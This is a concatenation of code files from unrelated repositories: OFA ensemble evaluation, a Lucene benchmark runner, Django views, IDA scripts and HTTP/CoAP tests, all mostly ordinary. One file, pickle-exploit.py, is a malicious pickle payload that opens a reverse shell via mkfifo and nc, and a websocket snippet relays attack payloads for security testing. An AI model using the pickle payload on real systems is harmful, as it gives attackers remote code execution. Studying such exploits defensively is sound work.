'note10_lat@[email protected]_finetune@25', 'note10_lat@[email protected]_finetune@25',
'note10_lat@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25',
'note8_lat@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25',
'note8_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25',
'LG-G8_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25',
'LG-G8_lat@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25',
'1080ti_gpu64@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25',
'1080ti_gpu64@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25',
'tx2_gpu16@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25',
'tx2_gpu16@[email protected]_finetune@25', 'cpu_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'cpu_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'flops@[email protected]_finetune@75',
'flops@[email protected]_finetune@75', 'flops@[email protected]_finetune@75', ]
def evaluate_ofa_space(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
net_acc=[]
for i, id in enumerate(net_id):
acc=""
for j in range(2, len(id)):
if id[j]=='.':
acc=id[j-2]+id[j-1]+id[j]+id[j+1]
net_acc.append(acc)
id =np.argsort(np.array(net_acc))
new_net_id = copy.deepcopy(net_id)
for i, sortid in enumerate(id):
new_net_id[i] = net_id[sortid]
print('new_net_id', new_net_id)
n = len(net_id)
best_acc = 0
space = []
best_team =[]
for i in range(1, n):
for j in range(i):
nets = []
team = []
team.append(j)
team.append(i)
net, image_size = ofa_specialized(net_id=new_net_id[j], pretrained=True)
nets.append(net)
net, image_size = ofa_specialized(net_id=new_net_id[i], pretrained=True)
nets.append(net)
acc = ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
if acc>best_acc:
best_acc=acc
best_team = team
print('space {} best_acc{}'.format(i+1, best_acc))
space.append(best_acc)
print('space:{}'.format(space))
return net_id[best_team[0]], net_id[best_team[1]]
def evaluate_ofa_best_acc_team(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
net_acc=[]
for i, id in enumerate(net_id):
acc=""
for j in range(2, len(id)):
if id[j]=='.':
acc=id[j-2]+id[j-1]+id[j]+id[j+1]
net_acc.append(acc)
id =np.argsort(np.array(net_acc))
new_net_id = copy.deepcopy(net_id)
for i, sortid in enumerate(id):
new_net_id[i] = net_id[sortid]
print('new_net_id', new_net_id)
n = len(net_id)
best_acc = 0
space = []
best_team =[]
i = n-1
for j in range(18, n):
nets = []
team = []
team.append(j)
team.append(i)
net, image_size = ofa_specialized(net_id=new_net_id[j], pretrained=True)
nets.append(net)
net, image_size = ofa_specialized(net_id=new_net_id[i], pretrained=True)
nets.append(net)
acc = ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
print('net i:{} netj:{} acc:{}'.format(new_net_id[i], new_net_id[j], acc))
if acc>best_acc:
best_acc=acc
best_team = team
print('space {} best_acc{}'.format(i+1, best_acc))
space.append(best_acc)
print('space:{}'.format(space))
return new_net_id[best_team[0]], new_net_id[best_team[1]]
def evaluate_ofa_random_sample(path, data_loader, batch_size=100, device='cuda:0', ensemble=False):
net_acc=[]
for i, id in enumerate(net_id):
acc=""
for j in range(2, len(id)):
if id[j]=='.':
acc=id[j-2]+id[j-1]+id[j]+id[j+1]
net_acc.append(acc)
id =np.argsort(np.array(net_acc))
new_net_id = copy.deepcopy(net_id)
for i, sortid in enumerate(id):
new_net_id[i] = net_id[sortid]
print('new_net_id', new_net_id)
n = len(net_id)
best_acc = 0
acc_list = []
space = []
best_team =[]
for k in range(20):
nets = []
team = []
i = random.randint(0, n-1)
j = (i + random.randint(1, n-1)) % n
print('i:{} j:{}'.format(i, j))
team.append(j)
team.append(i)
net, image_size = ofa_specialized(net_id=new_net_id[j], pretrained=True)
nets.append(net)
net, image_size = ofa_specialized(net_id=new_net_id[i], pretrained=True)
nets.append(net)
acc = ensemble_validate(nets, path, image_size, data_loader, batch_size, device)
print('net i:{} netj:{} acc:{}'.format(new_net_id[i], new_net_id[j], acc))
acc_list.append(acc)
if acc>best_acc:
best_acc=acc
best_team = team
avg_acc = np.mean(acc_list)
std_acc = np.std(acc_list, ddof=1)
var_acc = np.var(acc_list)
print("avg{} var{} std{}".format(avg_acc, std_acc, var_acc))
print('best_random_team best_acc{}'.format(best_team, best_acc))
space.append(best_acc)
print('space:{}'.format(space))
return new_net_id[best_team[0]], new_net_id[best_team[1]]
sort_net_id=['tx2_gpu16@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25',
'note10_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25',
'cpu_lat@11ms_top1@72. 0_finetune@25', '1080ti_gpu64@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25',
'tx2_gpu16@[email protected]_finetune@25', 'v100_gpu64@[email protected]_finetune@25', 'LG-G8_lat@11ms_to [email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'note10_lat@[email protected]_finetune@25', '1080ti_gpu 64@[email protected]_finetune@25', 'cpu_lat@[email protected]_finetune@25',
's7edge_lat@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'note8_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@25', '1080ti_gpu64@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25', 'note10_lat@[email protected]_finetune@25',
'cpu_lat@[email protected]_finetune@25', 'tx2_gpu16@[email protected]_finetune@25', 'pixel2_lat@[email protected]_finetune@25',
'v100_gpu64@[email protected]_finetune@25', 'note8_lat@[email protected]_finetune@25', 's7edge_lat@[email protected]_finetune@25',
'1080ti_gpu64@[email protected]_finetune@25', 'LG-G8_lat@[email protected]_finetune@25', 'pixel1_lat@[email protected]_finetune@75',
'pixel1_lat@[email protected]_finetune@75', 'flops@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75',
'flops@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75',
'flops@[email protected]_finetune@75', 'pixel1_lat@[email protected]_finetune@75', 'note10_lat@[email protected]_finetune@75']
``` |
{
"source": "johtani/luceneutil",
"score": 2
} |
#### File: src/python/runAnalyzerPerf.py
```python
import datetime
import os
import constants
LUCENE_ROOT = '/l/trunk.analyzers.nightly/lucene'
LOGS_ROOT = os.path.join(constants.LOGS_DIR, 'analyzers')
def run(cmd):
print('RUN: %s' % cmd)
if os.system(cmd):
raise RuntimeError('%s failed' % cmd)
os.chdir(LUCENE_ROOT)
t = datetime.datetime.now()
ymd = t.strftime('%Y-%m-%d')
print('\n%s' % ymd)
#run('python -u /home/mike/src/util/svnClean.py %s/..' % LUCENE_ROOT)
#run('svn cleanup')
#run('svn up')
run('git clean -xfd')
run('git pull origin master')
print('Compile...')
run('ant clean compile > compile.log 2>&1')
logFile = '%s/%s.log' % (LOGS_ROOT, ymd)
with open(logFile + '.tmp', 'w') as lf:
#lf.write('svnversion: %s\n' % os.popen('svnversion').read().strip())
lf.write('lucene master version: %s\n' % os.popen('git rev-parse HEAD').read().strip())
os.chdir(constants.BENCH_BASE_DIR)
lf.write('git version: %s\n' % os.popen('git rev-parse HEAD').read().strip())
lf.write('java version: %s\n' % os.popen('java -fullversion 2>&1').read().strip())
os.chdir(LUCENE_ROOT)
run('javac -d %s/build -cp build/core/classes/java:build/analysis/common/classes/java %s/src/main/perf/TestAnalyzerPerf.java' % (constants.BENCH_BASE_DIR, constants.BENCH_BASE_DIR))
print(' now run')
run('java -XX:+UseParallelGC -cp %s/build:build/core/classes/java:build/analysis/common/classes/java perf.TestAnalyzerPerf /l/data/enwiki-20130102-lines.txt >> %s.tmp 2>&1' % (constants.BENCH_BASE_DIR, logFile))
os.rename(logFile+'.tmp', logFile)
print(' done')
``` |
{
"source": "Johthema/pets",
"score": 2
} |
#### File: pets/core/views.py
```python
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.decorators import login_required
# Create your views here.
from.models import Pet
@login_required(login_url='/login/')
def register_pet(request):
pet_id = request.GET.get('id')
if pet_id:
pet = Pet.objects.get(id=pet_id)
if pet.user == request.user:
return render(request, 'register-pet.html', {'pet':pet})
return render(request, 'register-pet.html')
@login_required(login_url='/login/')
def set_pet(request):
city = request.POST.get('city')
email = request.POST.get('email')
phone = request.POST.get('phone')
description = request.POST.get('description')
photo = request.FILES.get('file')
pet_id = request.POST.get('pet-id')
user = request.user
if pet_id:
pet = Pet.objects.get(id=pet_id)
if user == pet.user:
pet.email = email
pet.phone = phone
pet.city = city
pet.description = description
if photo:
pet.photo = photo
pet.save()
else:
user = request.user
pet = Pet.objects.create(email=email, phone=phone, description=description,
photo=photo, user=user, city=city)
url = '/pet/detail/{}/'.format(pet.id)
return redirect(url)
@login_required(login_url='/login/')
def delete_pet(request, id):
pet = Pet.objects.get(id=id)
if pet.user == request.user:
pet.delete()
return redirect('/')
@login_required(login_url='/login/')
def list_all_pets(request):
pet = Pet.objects.filter(active=True)
return render(request, 'list.html', {'pet':pet})
def list_user_pets(request):
pet = Pet.objects.filter(active=True, user=request.user)
return render(request, 'list.html', {'pet':pet})
def pet_detail(request, id):
pet=Pet.objects.get(active=True, id=id)
return render (request, 'pet.html',{'pet':pet})
def login_user(request):
return render(request, 'login.html')
def logout_user(request):
print(request.user)
logout(request)
return redirect ('/login/')
@csrf_protect
def submit_login(request):
if request.POST:
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect('/')
else:
messages.error(request,'Usuario ou senha invรกlido.')
return redirect('/login/')
``` |
{
"source": "johto89/code-snippets",
"score": 3
} |
#### File: python/crypto/cordova-aes.py
```python
import os
import sys
import glob
import errno
import base64
from Crypto import Random
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key, iv):
self.key = key
self.iv = iv
def encrypt(self, source):
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
padding = AES.block_size - len(source) % AES.block_size
data = source + chr(padding) * padding
return base64.b64encode(cipher.encrypt(data))
def decrypt(self, source):
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
data = cipher.decrypt(base64.b64decode(source))
padding = ord(data[-1])
if data[-padding:] != chr(padding) * padding:
raise ValueError("Invalid padding...")
return data[:-padding]
def makedir(directory):
''' Make a directory. '''
try:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
print("[E] makedir")
if len(sys.argv) < 5 or sys.argv[1] not in ["dec", "enc"]:
print("Usage: python cordova-aes.py <enc/dec> <secret_key> <iv_value> <file(s)>")
sys.exit(1)
action = sys.argv[1]
key = sys.argv[2]
iv = sys.argv[3]
files = sys.argv[4:]
cipher = AESCipher(key, iv)
makedir(action)
if type(files) == str:
files = [files]
for filename in files:
out_path = action + "/" + filename
with open(filename, 'r') as inf:
data = inf.read()
if action == "dec":
data = data.replace('\n', '')
with open(out_path, "w") as f:
f.write(cipher.decrypt(data))
print("[+] Decrypted data have been written into '" + out_path + "'")
elif action == "enc":
with open(out_path, "w") as f:
f.write(cipher.encrypt(data))
print("[+] Encrypted data have been written into '" + out_path + "'")
```
#### File: code-snippets/python/web-socket middleware.py
```python
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection
ws_server = "ws://localhost:8156/ws"
def send_ws(payload):
ws = create_connection(ws_server)
# If the server returns a response on connect, use below line
#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
# For our case, format the payload in JSON
message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
data = '{"employeeID":"%s"}' % message
ws.send(data)
resp = ws.recv()
ws.close()
if resp:
return resp
else:
return ''
def middleware_server(host_port,content_type="text/plain"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
self.send_response(200)
try:
payload = urlparse(self.path).query.split('=',1)[1]
except IndexError:
payload = False
if payload:
content = send_ws(payload)
else:
content = 'No parameters specified!'
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(content.encode())
return
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()
print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")
try:
middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
pass
``` |
{
"source": "johto89/Google-Hacking-Tool-with-C-",
"score": 3
} |
#### File: johto89/Google-Hacking-Tool-with-C-/pickle-exploit.py
```python
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
'/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
return os.system, (cmd,)
if __name__ == '__main__':
pickled = pickle.dumps(RCE())
print(base64.urlsafe_b64encode(pickled))
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/highlight_all_CALLs.py
```python
from idc import *
from idaapi import *
from idautils import *
def main():
processor_name = GetCharPrm(INF_PROCNAME)
if processor_name == 'metapc':
call_instructions = ['call']
elif processor_name == 'ARM':
call_instructions = ['BL', 'BL.W', 'BX', 'BLX']
else:
print 'Unsupported processor type: %s' % (processor_name)
return
# For each segment
for segment_begin_ea in Segments():
segment_end_ea = SegEnd(segment_begin_ea)
# For each instruction
last_page = 0
for ea in list(Heads(segment_begin_ea, segment_end_ea)):
# Print log if a processing page changed
current_page = (ea & 0xffffffffffff0000)
if last_page != current_page:
last_page = current_page
print('Processing 0x%016X (Range of "%s" is 0x%016X - 0x%016X)' %
(last_page, SegName(current_page), segment_begin_ea,
segment_end_ea)
)
# Set colour if this instruction is any of call instructions
disasm = GetDisasm(ea)
for inst in call_instructions:
if disasm.startswith(inst + ' '):
SetColor(ea, CIC_ITEM, 0xd8bfd8)
if __name__ == '__main__':
main()
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/rotate.py
```python
def _rol(val, bits, bit_size):
return (val << bits % bit_size) & (2 ** bit_size - 1) | \
((val & (2 ** bit_size - 1)) >> (bit_size - (bits % bit_size)))
def _ror(val, bits, bit_size):
return ((val & (2 ** bit_size - 1)) >> bits % bit_size) | \
(val << (bit_size - (bits % bit_size)) & (2 ** bit_size - 1))
__ROR4__ = lambda val, bits: _ror(val, bits, 32)
__ROR8__ = lambda val, bits: _ror(val, bits, 64)
__ROL4__ = lambda val, bits: _rol(val, bits, 32)
__ROL8__ = lambda val, bits: _rol(val, bits, 64)
print('__ROR4__, __ROR8__, __ROL4__ and __ROL8__ were defined.')
print('Try this in the Python interpreter:')
print('hex(__ROR8__(0xD624722D3A28E80F, 0xD6))')
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/show_SEH_chain.py
```python
from idc import *
from idaapi import *
from idautils import *
def GetFsBase(tid):
idc.SelectThread(tid)
return idaapi.dbg_get_thread_sreg_base(tid, cpu.fs)
def GetExceptionChain(tid):
fs_base = GetFsBase(tid)
exc_rr = Dword(fs_base)
result = []
while exc_rr != 0xffffffff:
prev = Dword(exc_rr)
handler = Dword(exc_rr + 4)
print '%6d %08X %08X' % (tid, exc_rr + 4, handler)
exc_rr = prev
result.append(handler)
return result
def main():
print 'TID Address Handler'
curr_tid = idc.GetCurrentThreadId()
result = {}
for tid in idautils.Threads():
result[tid] = GetExceptionChain(tid)
idc.SelectThread(curr_tid)
if __name__=='__main__':
main()
```
#### File: Google-Hacking-Tool-with-C-/scripts_for_RE/visualize_binary.py
```python
import sys
import os
import math
# Third Party
import Image
# Original
def main(arg_values, arg_length):
"""Main routine"""
if arg_length != 2:
help(os.path.splitext(os.path.basename(sys.argv[0]))[0])
return
input_file_name = arg_values[1]
input_file = open(input_file_name, "rb")
input_data = bytearray(input_file.read())
if len(input_data) == 0:
print "Empty file."
return
IMAGE_WIDTH = 128
image_size = (IMAGE_WIDTH,
int(math.ceil(len(input_data) / (IMAGE_WIDTH * 1.0))))
image = Image.new("RGB", image_size, "white")
def convert_color(byte):
"""Decides a pixel color according to the rule of Stirling."""
if byte >= 0x80:
return 0x000000
elif byte >= 0x20:
return 0x0000ff
elif byte >= 0x01:
return 0xffff00
else:
return 0xffffff
def fill_image(input_data, image, image_size):
"""Puts color pixels on an image with color conversion"""
y_range = range(image_size[1])
x_range = range(IMAGE_WIDTH)
d_range = len(input_data)
pix = image.load()
index = 0
for y in y_range:
for x in x_range:
pix[x, y] = convert_color(input_data[index])
index += 1
if index >= d_range:
return
return
fill_image(input_data, image, image_size)
image.convert("P").save(input_file_name + ".png", "PNG")
return
if __name__ == "__main__":
main(sys.argv, len(sys.argv))
``` |
{
"source": "johtso/httpcore",
"score": 2
} |
#### File: tests/sync_tests/test_connection_pool.py
```python
from typing import Iterator, Tuple
import pytest
import httpcore
from httpcore._async.base import ConnectionState
from httpcore._types import URL, Headers
class MockConnection(object):
def __init__(self, http_version):
self.origin = (b"http", b"example.org", 80)
self.state = ConnectionState.PENDING
self.is_http11 = http_version == "HTTP/1.1"
self.is_http2 = http_version == "HTTP/2"
self.stream_count = 0
def request(
self,
method: bytes,
url: URL,
headers: Headers = None,
stream: httpcore.SyncByteStream = None,
ext: dict = None,
) -> Tuple[int, Headers, httpcore.SyncByteStream, dict]:
self.state = ConnectionState.ACTIVE
self.stream_count += 1
def on_close():
self.stream_count -= 1
if self.stream_count == 0:
self.state = ConnectionState.IDLE
def iterator() -> Iterator[bytes]:
yield b""
stream = httpcore.IteratorByteStream(
iterator=iterator(), close_func=on_close
)
return 200, [], stream, {}
def close(self):
pass
def info(self) -> str:
return str(self.state)
def mark_as_ready(self) -> None:
self.state = ConnectionState.READY
def is_connection_dropped(self) -> bool:
return False
class ConnectionPool(httpcore.SyncConnectionPool):
def __init__(self, http_version: str):
super().__init__()
self.http_version = http_version
assert http_version in ("HTTP/1.1", "HTTP/2")
def _create_connection(self, **kwargs):
return MockConnection(self.http_version)
def read_body(stream: httpcore.SyncByteStream) -> bytes:
try:
body = []
for chunk in stream:
body.append(chunk)
return b"".join(body)
finally:
stream.close()
@pytest.mark.parametrize("http_version", ["HTTP/1.1", "HTTP/2"])
def test_sequential_requests(http_version) -> None:
with ConnectionPool(http_version=http_version) as http:
info = http.get_connection_info()
assert info == {}
response = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code, headers, stream, ext = response
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.IDLE"]}
response = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code, headers, stream, ext = response
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.IDLE"]}
def test_concurrent_requests_h11() -> None:
with ConnectionPool(http_version="HTTP/1.1") as http:
info = http.get_connection_info()
assert info == {}
response_1 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_1, headers_1, stream_1, ext_1 = response_1
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
response_2 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_2, headers_2, stream_2, ext_2 = response_2
info = http.get_connection_info()
assert info == {
"http://example.org": ["ConnectionState.ACTIVE", "ConnectionState.ACTIVE"]
}
read_body(stream_1)
info = http.get_connection_info()
assert info == {
"http://example.org": ["ConnectionState.ACTIVE", "ConnectionState.IDLE"]
}
read_body(stream_2)
info = http.get_connection_info()
assert info == {
"http://example.org": ["ConnectionState.IDLE", "ConnectionState.IDLE"]
}
def test_concurrent_requests_h2() -> None:
with ConnectionPool(http_version="HTTP/2") as http:
info = http.get_connection_info()
assert info == {}
response_1 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_1, headers_1, stream_1, ext_1 = response_1
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
response_2 = http.request(b"GET", (b"http", b"example.org", None, b"/"))
status_code_2, headers_2, stream_2, ext_2 = response_2
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream_1)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.ACTIVE"]}
read_body(stream_2)
info = http.get_connection_info()
assert info == {"http://example.org": ["ConnectionState.IDLE"]}
``` |
{
"source": "johtso/httpx-caching",
"score": 2
} |
#### File: httpx-caching/tests/test_serialization.py
```python
import msgpack
from httpx_caching._models import Response
from httpx_caching._serializer import Serializer
class TestSerializer(object):
def setup(self):
self.serializer = Serializer()
self.response_data = {
"response": {
"body": b"Hello World",
"headers": {
"Content-Type": "text/plain",
"Expires": "87654",
"Cache-Control": "public",
},
"status_code": 200,
"extensions": {},
},
"vary": {},
}
def test_read_version_v0(self):
resp, _vary_fields = self.serializer._loads_v0(
msgpack.dumps(self.response_data)
)
assert resp.stream.read() == b"Hello World"
def test_dumps(self):
assert self.serializer.dumps(
Response.from_raw((200, {}, b"foo", {})),
{},
b"foo",
)
``` |
{
"source": "johtso/py-air-control",
"score": 2
} |
#### File: py-air-control/testing/coap_test_server.py
```python
from threading import Thread
import time
from coapthon.server.coap import CoAP
from coapthon.client.helperclient import HelperClient
from coapthon.resources.resource import Resource
from coapthon import defines
class CoAPTestServer:
def __init__(self, port):
super().__init__()
self.coap_server = CoAP(("127.0.0.1", port))
self.client = HelperClient(server=("127.0.0.1", port))
self.add_url_rule("testCoapIsAlive", CoapTestResource())
self.thread = Thread(target=self._run)
def _test_connection(self):
try:
request = self.client.mk_request(defines.Codes.GET, "testCoapIsAlive")
response = self.client.send_request(request, None, 2)
if response.payload == "success":
return True
else:
return False
except Exception as e:
return True
def _run(self):
self.coap_server.listen(5)
def start(self):
self.thread.start()
while not self._test_connection():
time.sleep(1)
def stop(self):
self.coap_server.close()
self.client.close()
self.thread.join(5)
def add_url_rule(self, path, resource):
assert isinstance(resource, Resource)
path = path.strip("/")
paths = path.split("/")
actual_path = ""
i = 0
for p in paths:
i += 1
actual_path += "/" + p
try:
res = self.coap_server.root[actual_path]
except KeyError:
res = None
if res is None:
resource.path = actual_path
self.coap_server.root[actual_path] = resource
# TODO: Code can be removed after Coapthon3 > 1.01 is ready and imported, add code below instead
# self.coap_server.add_resource(rule, resource)
class CoapTestResource(Resource):
def __init__(self, name="CoapTestResource"):
super(CoapTestResource, self).__init__(name)
self.payload = "success"
def render_GET(self, request):
return self
```
#### File: py-air-control/testing/plain_coap_resources.py
```python
import os
import json
from coapthon.resources.resource import Resource
class StatusResource(Resource):
def __init__(self, name="StatusResource"):
super(StatusResource, self).__init__(name)
self.dataset = None
self.test_data = self._test_data()
self.content_type = "application/json"
def _test_data(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, "data.json"), "r") as json_file:
return json.load(json_file)
def set_dataset(self, dataset):
self.dataset = dataset
def render_GET_advanced(self, request, response):
if self.dataset is None:
raise Exception("StatusResource: set dataset before running tests")
response.payload = '{{"state":{{"reported": {} }} }}'.format(
self.test_data["plain-coap"][self.dataset]["data"]
)
return self, response
class ControlResource(Resource):
def __init__(self, name="ControlResource"):
super(ControlResource, self).__init__(name)
self.content_type = "application/json"
self.data = []
def append_data(self, data):
self.data.append(data)
def render_POST_advanced(self, request, response):
if self.data.count == 0:
raise Exception("ControlResource: set data before running tests")
change_request = json.loads(request.payload)["state"]["desired"]
success = "failed"
for data in self.data:
if json.loads(data) == change_request:
success = "success"
break
response.payload = '{{"status":"{}"}}'.format(success)
return self, response
```
#### File: py-air-control/testing/test_coap.py
```python
import os
import json
import pytest
from pyairctrl.coap_client import CoAPAirClient
from pyairctrl.airctrl import CoAPCli
from coap_test_server import CoAPTestServer
from coap_resources import SyncResource, ControlResource, StatusResource
class TestCoap:
@pytest.fixture(scope="class")
def air_client(self):
return CoAPAirClient("127.0.0.1")
@pytest.fixture(scope="class")
def air_cli(self):
return CoAPCli("127.0.0.1")
@pytest.fixture(scope="class")
def test_data(self):
return self._test_data()
def _test_data(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, "data.json"), "r") as json_file:
return json.load(json_file)
@pytest.fixture(scope="class")
def sync_resource(self):
return SyncResource()
@pytest.fixture(scope="class")
def status_resource(self):
return StatusResource()
@pytest.fixture(scope="class")
def control_resource(self):
return ControlResource()
@pytest.fixture(autouse=True)
def set_defaults(self, sync_resource, control_resource, status_resource):
control_resource.set_data(
'{"CommandType": "app", "DeviceId": "", "EnduserId": "", "mode": "A"}'
)
status_resource.set_dataset("status")
status_resource.set_encryption_key(sync_resource.encryption_key)
status_resource.set_render_callback(None)
@pytest.fixture(scope="class", autouse=True)
def coap_server(self, sync_resource, status_resource, control_resource):
server = CoAPTestServer(5683)
server.add_url_rule("/sys/dev/status", status_resource)
server.add_url_rule("/sys/dev/control", control_resource)
server.add_url_rule("/sys/dev/sync", sync_resource)
server.start()
yield server
server.stop()
def test_sync_was_called(self, air_client):
assert air_client.client_key == SyncResource.SYNC_KEY
def test_set_values(self, air_client):
values = {}
values["mode"] = "A"
result = air_client.set_values(values)
assert result
def test_key_is_increased(self, control_resource):
air_client = CoAPAirClient("127.0.0.1")
values = {}
values["mode"] = "A"
result = air_client.set_values(values)
assert (
int(control_resource.encoded_counter, 16)
== int(SyncResource.SYNC_KEY, 16) + 1
)
def test_response_is_cut_off_should_return_error(self, status_resource, capfd):
air_client = CoAPAirClient("127.0.0.1")
status_resource.set_render_callback(self.cutoff_data)
air_client.get_status()
result, err = capfd.readouterr()
assert "Message from device got corrupted" in result
def cutoff_data(self, data):
return data[:-8]
def test_get_status_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
self.assert_json_data(
air_client.get_status,
"status",
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_status_longsize_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
dataset = "status-longsize"
status_resource.set_dataset(dataset)
self.assert_json_data(
air_client.get_status,
dataset,
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_firmware_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
self.assert_json_data(
air_client.get_firmware,
"status",
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_filters_is_valid(
self, sync_resource, status_resource, air_client, test_data
):
self.assert_json_data(
air_client.get_filters,
"status",
test_data,
air_client,
sync_resource,
status_resource,
)
def test_get_cli_status_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
self.assert_cli_data(
air_cli.get_status,
"status-cli",
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_status_for_AC3858_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
dataset = "status-AC3858"
status_resource.set_dataset(dataset)
self.assert_cli_data(
air_cli.get_status,
"{}-cli".format(dataset),
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_status_err193_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
dataset = "status-err193"
status_resource.set_dataset(dataset)
self.assert_cli_data(
air_cli.get_status,
"{}-cli".format(dataset),
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_firmware_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
self.assert_cli_data(
air_cli.get_firmware,
"firmware-cli",
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def test_get_cli_filters_is_valid(
self, sync_resource, status_resource, air_cli, test_data, capfd
):
self.assert_cli_data(
air_cli.get_filters,
"fltsts-cli",
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
)
def assert_json_data(
self, air_func, dataset, test_data, air_client, sync_resource, status_resource
):
result = air_func()
data = test_data["coap"][dataset]["data"]
json_data = json.loads(data)
assert result == json_data
def assert_cli_data(
self,
air_func,
dataset,
test_data,
air_cli,
capfd,
sync_resource,
status_resource,
):
air_func()
result, err = capfd.readouterr()
assert result == test_data["coap"][dataset]["data"]
``` |
{
"source": "johuck/MPContribs",
"score": 2
} |
#### File: api/contributions/views.py
```python
import re
import os
from collections import defaultdict
import flask_mongorest
from flask import Blueprint
from flask_mongorest.resources import Resource
from flask_mongorest import operators as ops
from flask_mongorest.methods import *
from flask_mongorest.exceptions import UnknownFieldError
from mpcontribs.api.core import SwaggerView
from mpcontribs.api.contributions.document import Contributions
from mpcontribs.api.structures.document import Structures
from mpcontribs.api.tables.document import Tables
templates = os.path.join(os.path.dirname(flask_mongorest.__file__), "templates")
contributions = Blueprint("contributions", __name__, template_folder=templates)
exclude = r'[^$.\s_~`^&(){}[\]\\;\'"/]'
class ContributionsResource(Resource):
document = Contributions
filters = {
"id": [ops.In, ops.Exact],
"project": [ops.In, ops.Exact],
"identifier": [ops.In, ops.Contains, ops.Exact],
"formula": [ops.In, ops.Contains, ops.Exact],
"is_public": [ops.Boolean],
